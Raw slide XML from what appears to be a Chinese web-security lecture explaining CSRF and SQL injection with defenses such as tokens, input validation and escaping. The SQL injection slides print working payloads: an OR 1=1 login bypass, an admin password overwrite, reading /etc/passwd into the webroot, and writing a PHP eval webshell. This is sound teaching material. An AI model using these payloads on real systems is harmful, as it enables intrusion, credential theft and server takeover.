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47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1361-9C31-4948-B17A-FC22CC34978E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9DC6-42D5-4DB1-ADD7-51643CD93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安全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dirty="0" smtClean="0"/>
              <a:t>银行</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" dirty="0"/>
              <a:t>网站</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>A，</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" dirty="0"/>
              <a:t>它以</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>GET</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" dirty="0"/>
              <a:t>请求来完成银行转账的操作，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http://bank.com/Transfer.php?toBankId=11&amp;money=100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危险</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" dirty="0"/>
              <a:t>网站</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>B，</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" dirty="0"/>
              <a:t>它里面有一段</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>HTML</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" dirty="0"/>
              <a:t>的代码如下：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=http</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>://</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" dirty="0" smtClean="0"/>
              <a:t>b</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>ank.com/Transfer.php?toBankId=11&amp;m</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1" smtClean="0"/>
              <a:t>oney</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>=100&gt;</a:t>
            </a:r>
            <a:endParaRPr lang="en-US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首先</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" dirty="0"/>
              <a:t>，你登录了银行网站</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>A，</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" dirty="0"/>
              <a:t>然后访问危险网站</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>B，</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" dirty="0"/>
              <a:t>噢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这时</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" dirty="0"/>
              <a:t>你会发现你的银行账户少了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</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" dirty="0"/>
              <a:t>......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r>
              <a:rPr lang="en-US" altLang="zh-CN" dirty="0" smtClean="0"/>
              <a:t>CSRF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1.</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" b="0" dirty="0" smtClean="0"/>
              <a:t>页面增加随机</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" dirty="0"/>
              <a:t>值</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" b="0" dirty="0" smtClean="0"/>
              <a:t>验证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zh-CN" altLang="en-US" b="0" dirty="0" smtClean="0"/>
              <a:t>表单使用一个隐藏的验证值，该值是服务端发下来的，服务端验证表单提交上来的值是否和</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" dirty="0"/>
              <a:t>下发</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" b="0" dirty="0" smtClean="0"/>
              <a:t>的值一致。</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" altLang="zh-CN" b="0" dirty="0" smtClean="0"/>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" b="0" dirty="0" smtClean="0"/>
              <a:t>2.</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" b="0" dirty="0" smtClean="0"/>
              <a:t>验证码</a:t>
            </a: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SQL</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" dirty="0" smtClean="0"/>
              <a:t>注</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" dirty="0"/>
              <a:t>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0" dirty="0" smtClean="0"/>
              <a:t>示例</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" b="0" dirty="0" smtClean="0"/>
              <a:t>1</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" b="0" dirty="0" smtClean="0"/>
              <a:t>$query = “SELECT * FROM users WHERE username=‘$username’ AND password=‘$password’ ”;</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" b="0" dirty="0" smtClean="0"/>
              <a:t>$username = “ok’ OR 1=1 #” ;</a:t>
            </a:r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$query = “SELECT * FROM users WHERE username=‘ok’ OR 1=1 #’ AND password=‘XXX’ ”;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SQL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0" dirty="0" smtClean="0"/>
              <a:t>示例</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" b="0" dirty="0" smtClean="0"/>
              <a:t>2</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" b="0" dirty="0" smtClean="0"/>
              <a:t>$query = “UPDATE user SET password='MD5($password)', homepage='$homepage' WHERE id='$id‘”;</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" b="0" dirty="0" smtClean="0"/>
              <a:t>$password = “</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" b="0" dirty="0" err="1" smtClean="0"/>
              <a:t>mypass</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" b="0" dirty="0" smtClean="0"/>
              <a:t>)' WHERE username='admin'# “ ;</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" b="0" dirty="0" smtClean="0"/>
              <a:t>$query = “UPDATE user SET password='MD5(</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" b="0" dirty="0" err="1" smtClean="0"/>
              <a:t>mypass</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" b="0" dirty="0" smtClean="0"/>
              <a:t>)' WHERE username='admin'# )', homepage='$homepage' WHERE id='$id‘”;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SQL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4000" b="0" dirty="0" smtClean="0"/>
              <a:t>示例</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="4000" b="0" dirty="0" smtClean="0"/>
              <a:t>3(</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="4000" b="0" dirty="0" smtClean="0"/>
              <a:t>恐怖！！！</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="4000" b="0" dirty="0" smtClean="0"/>
              <a:t>)</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" b="0" dirty="0" smtClean="0"/>
              <a:t>$query = “SELECT * FROM </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" b="0" dirty="0" err="1" smtClean="0"/>
              <a:t>v_movie</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" b="0" dirty="0" smtClean="0"/>
              <a:t> WHERE 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=$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” ;</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" b="0" dirty="0" smtClean="0"/>
              <a:t>$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 = “1 UNION select </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" b="0" dirty="0" err="1" smtClean="0"/>
              <a:t>load_file</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" b="0" dirty="0" smtClean="0"/>
              <a:t>(‘/etc/</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" b="0" dirty="0" err="1" smtClean="0"/>
              <a:t>passwd</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" b="0" dirty="0" smtClean="0"/>
              <a:t>’) into </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" b="0" dirty="0" err="1" smtClean="0"/>
              <a:t>outfile</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" b="0" dirty="0" smtClean="0"/>
              <a:t> ‘&lt;</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" b="0" dirty="0" err="1" smtClean="0"/>
              <a:t>webroot</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" b="0" dirty="0" smtClean="0"/>
              <a:t>&gt;/passwd.txt’”;</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" b="0" dirty="0" smtClean="0"/>
              <a:t>$query = “SELECT * FROM </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" b="0" dirty="0" err="1" smtClean="0"/>
              <a:t>v_movie</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" b="0" dirty="0" smtClean="0"/>
              <a:t> WHERE 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= 1 UNION select </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" b="0" dirty="0" err="1" smtClean="0"/>
              <a:t>load_file</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" b="0" dirty="0" smtClean="0"/>
              <a:t>(‘/etc/</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" b="0" dirty="0" err="1" smtClean="0"/>
              <a:t>passwd</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" b="0" dirty="0" smtClean="0"/>
              <a:t>') into </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" b="0" dirty="0" err="1" smtClean="0"/>
              <a:t>outfile</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" b="0" dirty="0" smtClean="0"/>
              <a:t> ‘&lt;</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" b="0" dirty="0" err="1" smtClean="0"/>
              <a:t>webroot</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" b="0" dirty="0" smtClean="0"/>
              <a:t>&gt;/passwd.txt’” ;</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" b="0" dirty="0" err="1" smtClean="0"/>
              <a:t>Load_file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一般可以来查看，</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" b="0" dirty="0" smtClean="0"/>
              <a:t>config.php</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" b="0" dirty="0" smtClean="0"/>
              <a:t>（</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" b="0" dirty="0" err="1" smtClean="0"/>
              <a:t>mysql</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" b="0" dirty="0" smtClean="0"/>
              <a:t>的密码等配置），</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" b="0" dirty="0" smtClean="0"/>
              <a:t>apache or </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" b="0" dirty="0" err="1" smtClean="0"/>
              <a:t>nginx</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" b="0" dirty="0" smtClean="0"/>
              <a:t>的配置文件，其他敏感文件等</a:t>
            </a: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SQL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4000" b="0" dirty="0" smtClean="0"/>
              <a:t>示例</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="4000" b="0" dirty="0" smtClean="0"/>
              <a:t>4(</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="4000" b="0" dirty="0" smtClean="0"/>
              <a:t>非常恐怖！！！</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="4000" b="0" dirty="0" smtClean="0"/>
              <a:t>)</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" b="0" dirty="0" smtClean="0"/>
              <a:t>$query = “SELECT * FROM </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" b="0" dirty="0" err="1" smtClean="0"/>
              <a:t>v_movie</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" b="0" dirty="0" smtClean="0"/>
              <a:t> WHERE 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=$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” ;</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" b="0" dirty="0" smtClean="0"/>
              <a:t>$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 = “1 UNION select '&lt;?</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" b="0" dirty="0" err="1" smtClean="0"/>
              <a:t>php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eval</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" b="0" dirty="0" smtClean="0"/>
              <a:t>($_POST[</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" b="0" dirty="0" err="1" smtClean="0"/>
              <a:t>cmd</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" b="0" dirty="0" smtClean="0"/>
              <a:t>])?&gt;' into </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" b="0" dirty="0" err="1" smtClean="0"/>
              <a:t>outfile</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" b="0" dirty="0" smtClean="0"/>
              <a:t> '/www/xxx/</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" b="0" dirty="0" err="1" smtClean="0"/>
              <a:t>htdocs</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" b="0" dirty="0" smtClean="0"/>
              <a:t>/webshell.php' ”;</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" b="0" dirty="0" smtClean="0"/>
              <a:t>$query = “SELECT * FROM </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" b="0" dirty="0" err="1" smtClean="0"/>
              <a:t>v_movie</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" b="0" dirty="0" smtClean="0"/>
              <a:t> WHERE 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= 1 UNION select '&lt;?</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" b="0" dirty="0" err="1" smtClean="0"/>
              <a:t>php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eval</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" b="0" dirty="0" smtClean="0"/>
              <a:t>($_POST[</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" b="0" dirty="0" err="1" smtClean="0"/>
              <a:t>cmd</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" b="0" dirty="0" smtClean="0"/>
              <a:t>])?&gt;' into </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" b="0" dirty="0" err="1" smtClean="0"/>
              <a:t>outfile</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" b="0" dirty="0" smtClean="0"/>
              <a:t> '/data/</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" b="0" dirty="0" err="1" smtClean="0"/>
              <a:t>wwwroot</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" b="0" dirty="0" smtClean="0"/>
              <a:t>/</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" b="0" dirty="0" err="1" smtClean="0"/>
              <a:t>public_html</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" b="0" dirty="0" smtClean="0"/>
              <a:t>/webshell.php' ” ;</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" b="0" dirty="0" smtClean="0"/>
              <a:t>OK,U can do anything you like</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" b="0" dirty="0" smtClean="0"/>
              <a:t>！</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" altLang="zh-CN" b="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SQL</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" dirty="0" smtClean="0"/>
              <a:t>注入防御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0" dirty="0" smtClean="0"/>
              <a:t>1.</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" b="0" dirty="0" smtClean="0"/>
              <a:t>检查输入的数据是否具有所期望的数据格式。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    </a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" b="0" dirty="0" smtClean="0"/>
              <a:t>PHP </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" b="0" dirty="0" smtClean="0"/>
              <a:t>有很多可以用于检查输入的函数，从简单</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" b="0" dirty="0" smtClean="0"/>
              <a:t>的</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" dirty="0" smtClean="0"/>
              <a:t>数字</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" b="0" dirty="0" smtClean="0"/>
              <a:t>函数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和</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" b="0" dirty="0" smtClean="0"/>
              <a:t>字符类型函数（比如 </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" b="0" dirty="0" err="1" smtClean="0"/>
              <a:t>is_numeric</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" b="0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is_string</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" b="0" dirty="0" smtClean="0"/>
              <a:t>()</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" b="0" dirty="0" smtClean="0"/>
              <a:t>）</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" b="0" dirty="0" smtClean="0"/>
              <a:t>到正则表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达式</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" b="0" dirty="0" smtClean="0"/>
              <a:t>函数都可以完成这个工作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b="0" dirty="0" smtClean="0"/>
              <a:t>数字类型的值使用</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" b="0" dirty="0" err="1" smtClean="0"/>
              <a:t>intval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&lt;?</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" b="0" dirty="0" err="1" smtClean="0"/>
              <a:t>php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$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= </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" b="0" dirty="0" err="1" smtClean="0"/>
              <a:t>intval</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" b="0" dirty="0" smtClean="0"/>
              <a:t>($_GET[‘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’]);</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" b="0" dirty="0" smtClean="0"/>
              <a:t>$query = "SELECT * FROM </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" b="0" dirty="0" err="1" smtClean="0"/>
              <a:t>v_movie</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" b="0" dirty="0" smtClean="0"/>
              <a:t> WHERE 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=$</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" b="0" dirty="0" err="1" smtClean="0"/>
              <a:t>movieid</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" b="0" dirty="0" smtClean="0"/>
              <a:t>";</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" b="0" dirty="0" smtClean="0"/>
              <a:t>?&gt;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SQL</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" dirty="0" smtClean="0"/>
              <a:t>注入防御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0" dirty="0" smtClean="0"/>
              <a:t>2.</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" b="0" dirty="0" smtClean="0"/>
              <a:t>使用数据库特定的敏感字符转义函数。如果数据库没有专门的敏感字符转义功能的话 </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" b="0" dirty="0" err="1" smtClean="0"/>
              <a:t>addslashes</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" b="0" dirty="0" smtClean="0"/>
              <a:t>() </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" b="0" dirty="0" smtClean="0"/>
              <a:t>和 </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" b="0" dirty="0" err="1" smtClean="0"/>
              <a:t>str_replace</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" b="0" dirty="0" smtClean="0"/>
              <a:t>() </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" b="0" dirty="0" smtClean="0"/>
              <a:t>可以代替完成这个工作。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mysql_escape_string</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" b="0" dirty="0" smtClean="0"/>
              <a:t>():</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" b="0" dirty="0" smtClean="0"/>
              <a:t>该函数转义出一个可以安全用于</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" b="0" dirty="0" err="1" smtClean="0"/>
              <a:t>mysql_query</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" b="0" dirty="0" smtClean="0"/>
              <a:t>()</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" b="0" dirty="0" smtClean="0"/>
              <a:t>的查询字符串。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addslashes</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" b="0" dirty="0" smtClean="0"/>
              <a:t>() :</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" b="0" dirty="0" smtClean="0"/>
              <a:t>转义</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" b="0" dirty="0" smtClean="0"/>
              <a:t>’,”,\</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" b="0" dirty="0" smtClean="0"/>
              <a:t>为</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" b="0" dirty="0" smtClean="0"/>
              <a:t>\’,\”,\\</a:t>
            </a:r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str_replace</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" b="0" dirty="0" smtClean="0"/>
              <a:t>():</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" b="0" dirty="0" smtClean="0"/>
              <a:t>替换存在危险隐患的字符串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preg_replace</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" b="0" dirty="0" smtClean="0"/>
              <a:t>():</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" b="0" dirty="0" smtClean="0"/>
              <a:t>按照查询语句的格式，构造特定格式的查询字符串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注：</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" b="0" dirty="0" smtClean="0"/>
              <a:t> php.ini </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" b="0" dirty="0" err="1" smtClean="0"/>
              <a:t>magic_quotes_gpc</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" b="0" dirty="0" smtClean="0"/>
              <a:t> =on,</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" b="0" dirty="0" smtClean="0"/>
              <a:t>将自动对</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" b="0" dirty="0" smtClean="0"/>
              <a:t>GET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POST </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" b="0" dirty="0" smtClean="0"/>
              <a:t>和 </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" b="0" dirty="0" smtClean="0"/>
              <a:t>COOKIE </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" b="0" dirty="0" smtClean="0"/>
              <a:t>数据自动运行 </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" b="0" dirty="0" err="1" smtClean="0"/>
              <a:t>addslashes</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" b="0" dirty="0" smtClean="0"/>
              <a:t>()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SQL</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" dirty="0" smtClean="0"/>
              <a:t>注入防御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0" dirty="0" smtClean="0"/>
              <a:t>3.</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" b="0" dirty="0" smtClean="0"/>
              <a:t>要不择手段避免显示出任何有关数据库的信息，尤其是数据库结构。</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" altLang="zh-CN" b="0" dirty="0" smtClean="0"/>
          </a:p>
          <a:p>
            <a:pPr lvl="1">
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" b="0" dirty="0" smtClean="0"/>
              <a:t>@</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" b="0" dirty="0" smtClean="0"/>
              <a:t>符号抑制查询时错误输出。</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" b="0" dirty="0" smtClean="0"/>
              <a:t>@</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" b="0" dirty="0" err="1" smtClean="0"/>
              <a:t>mysql_query</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" b="0" dirty="0" smtClean="0"/>
              <a:t>();</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1">
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" b="0" dirty="0" smtClean="0"/>
              <a:t>Php.ini</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" b="0" dirty="0" smtClean="0"/>
              <a:t>中 </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" b="0" dirty="0" err="1" smtClean="0"/>
              <a:t>display_errors</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" b="0" dirty="0" smtClean="0"/>
              <a:t> = off,</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" b="0" dirty="0" smtClean="0"/>
              <a:t>关闭错误输出。</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" altLang="zh-CN" b="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SQL</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" dirty="0" smtClean="0"/>
              <a:t>注入防御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0" dirty="0" smtClean="0"/>
              <a:t>4.</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" b="0" dirty="0" smtClean="0"/>
